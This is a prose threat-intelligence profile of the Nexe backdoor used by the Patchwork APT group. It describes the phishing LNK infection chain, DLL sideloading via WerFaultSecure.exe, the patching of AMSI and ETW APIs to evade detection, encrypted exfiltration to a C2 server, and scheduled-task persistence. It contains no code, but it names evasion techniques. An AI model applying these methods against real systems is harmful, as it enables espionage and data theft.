Overview
The Nexe backdoor, recently uncovered as part of an ongoing cyber espionage campaign, represents a new phase in the Patchwork APT group’s tactics. Known for its sophisticated and stealthy techniques, Patchwork has long been a threat to government, defense, and diplomatic organizations across South and Southeast Asia. This newly identified backdoor showcases the group’s evolving methods, employing advanced evasion techniques to bypass traditional security measures and maintain persistence on compromised systems. The Nexe backdoor is designed to steal sensitive data from targeted organizations while remaining undetected, demonstrating the group’s continuous innovation in malware development.
The Nexe backdoor is deployed through a malicious LNK file, often delivered via phishing emails, which tricks the user into executing a PowerShell script. This script downloads two files—a seemingly harmless PDF and a malicious DLL. The DLL is then executed using a legitimate system file, leveraging the technique of DLL sideloading to obscure the malware’s presence. Once the backdoor is installed, it carries out a series of complex actions, including the manipulation of system APIs to evade detection from security tools such as AMSI and Windows Event Tracing. This ability to manipulate system processes and operate covertly in memory makes the Nexe backdoor a highly effective tool for cyber espionage.
Targets
Information
Individuals
Public Administration
How they operate
The initial stage of the Nexe infection begins with the execution of a malicious LNK file, typically delivered via phishing emails. The LNK file appears as a PDF, often named to lure the victim into opening it. When executed, the LNK file triggers a PowerShell script, which first downloads two files: an innocuous-looking PDF file and a malicious Dynamic Link Library (DLL) file. The PDF serves only as a decoy, while the DLL file, containing encrypted shellcode, is the core component of the attack. To ensure the DLL is executed, the PowerShell script uses a technique known as DLL sideloading. This process involves copying a legitimate Windows system file, “WerFaultSecure.exe,” and placing it in a directory where it can be used to load the malicious DLL, thus obfuscating malicious activity.
Once the DLL is loaded into memory, it decrypts and executes the shellcode embedded within it. The shellcode’s primary function is to patch critical system APIs, specifically the AMSI (Antimalware Scan Interface) and the Event Tracing for Windows (ETW) systems. By modifying the AmsiScanBuffer, AmsiScanString, and EtwEventWrite APIs, the malware effectively disables security tools that rely on these systems to detect malicious behavior. This memory patching technique is particularly effective at bypassing security solutions, allowing the Nexe backdoor to run without raising red flags. Once the shellcode has successfully manipulated the necessary APIs, it loads the final payload directly into memory, enabling the attacker to execute commands without triggering security alarms.
The final payload of the Nexe backdoor is designed to harvest sensitive information from the compromised machine. This includes system details such as the device’s public and private IP addresses, MAC address, process ID, and Windows version. The malware collects this information, hashes it, and then encrypts it using the Salsa20 encryption algorithm. The encrypted data is then Base64 encoded before being sent to the attacker’s command-and-control server via an HTTP request. This method of data exfiltration ensures that the stolen information remains concealed from typical network monitoring systems. Moreover, the malware’s use of hardcoded domains for communication and encrypted data transmission further complicates detection by traditional network security tools.
In addition to its exfiltration capabilities, the Nexe backdoor also ensures its persistence on the compromised system. After installation, it creates a scheduled task to execute “WerFaultSecure.exe” at regular intervals, ensuring that the malware remains active even if the system is rebooted. Furthermore, the malware creates a mutex to prevent multiple instances from running simultaneously, avoiding detection from system monitoring tools that might flag multiple instances of the same process. By combining these advanced evasion techniques, the Nexe backdoor represents a significant threat to targeted organizations, capable of stealthily collecting and transmitting sensitive data while maintaining long-term access to compromised systems. The technical complexity and sophistication of the Nexe backdoor highlight the evolving nature of advanced persistent threats and the need for more proactive, adaptive security measures to defend against them.
References:
